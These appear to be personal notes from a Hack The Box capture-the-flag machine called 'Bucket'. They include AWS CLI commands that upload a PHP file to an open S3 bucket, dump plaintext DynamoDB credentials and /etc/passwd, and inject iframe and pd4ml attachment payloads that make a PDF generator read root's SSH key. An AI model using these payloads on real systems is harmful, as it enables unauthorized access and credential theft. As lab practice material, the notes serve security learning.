bucket.htb - static website, not much to it
images are hosted on s3.bucket.htb/adserver/images/*
adserver is an s3 bucket name
running localstack - maybe vulnerable?
allows weird headers

$- aws s3 cp parrotguy.php s3://adserver/parrotguy.php --endpoint-url http://s3.bucket.htb --no-sign-request

┌─[parrot@parrot-virtualbox]─[~/htb] 
└──╼ $aws s3 ls s3://adserver/ --endpoint-url http://s3.bucket.htb --no-sign-request
                           PRE images/
2021-04-17 17:05:09       5344 index.html
┌─[parrot@parrot-virtualbox]─[~/htb/bucket]
└──╼ $aws s3 ls s3://adserver/ --endpoint-url http://s3.bucket.htb --no-sign-request
                           PRE images/
2021-04-17 17:15:03       5344 index.html
2021-04-17 17:16:07         80 parrotguy.php
┌─[parrot@parrot-virtualbox]─[~/htb/bucket]
└──╼ $aws s3 ls s3://adserver/ --endpoint-url http://s3.bucket.htb --no-sign-request
                           PRE images/
2021-04-17 17:17:02       5344 index.html

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
roy:x:1000:1000:,,,:/home/roy:/bin/bash

aws dynamodb list-tables --endpoint-url http://localhost:4566 --region us-east-1 --no-sign-request
{
    "TableNames": [
        "users"
    ]
}
aws dynamodb scan --table-name users --endpoint-url http://localhost:4566 --region us-east-1 --no-sign-request
{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}

ROY PASSWORD: n2vM-<_K_Q:.Aa2

aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://s3.bucket.htb
aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://s3.bucket.htb
aws dynamodb put-item --table-name alerts --item {         "title": {"S": "Ransomware"},         "data": {"S": "<html><head></head><body><iframe src=/root/.ssh/id_rsa></iframe></body></html>"}       } --return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb
aws dynamodb put-item --table-name alerts --item {         "title": {"S": "Ransomware"},         "data": {"S": "<html><head></head><body><iframe src=/root/.ssh/id_rsa></iframe></body></html>"}       } --return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb
aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://s3.bucket.htb

[*] net000 Services listening only on localhost............................ yes!
---
tcp    LISTEN  0       4096         127.0.0.1:45163        0.0.0.0:*            
tcp    LISTEN  0       4096         127.0.0.1:4566         0.0.0.0:*            
tcp    LISTEN  0       511          127.0.0.1:8000         0.0.0.0:*            
---

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
	if($_POST["action"]==="get_alerts") {
		date_default_timezone_set('America/New_York');
		$client = new DynamoDbClient([
			'profile' => 'default',
			'region'  => 'us-east-1',
			'version' => 'latest',
			'endpoint' => 'http://localhost:4566'
		]);

		$iterator = $client->getIterator('Scan', array(
			'TableName' => 'alerts',
			'FilterExpression' => "title = :title",
			'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
		));

		foreach ($iterator as $item) {
			$name=rand(1,10000).'.html';
			file_put_contents('files/'.$name,$item["data"]);
		}
		passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
	}
}
else
{
?>

scp roy@bucket.htb:/tmp/parrotguy/* ./files

<pd4ml:attachment src=\"file:///etc/passwd\"><pd4ml:attachment>
<pd4ml:attachment src=\"file:/var/www/bucket-app/index.php\"/>
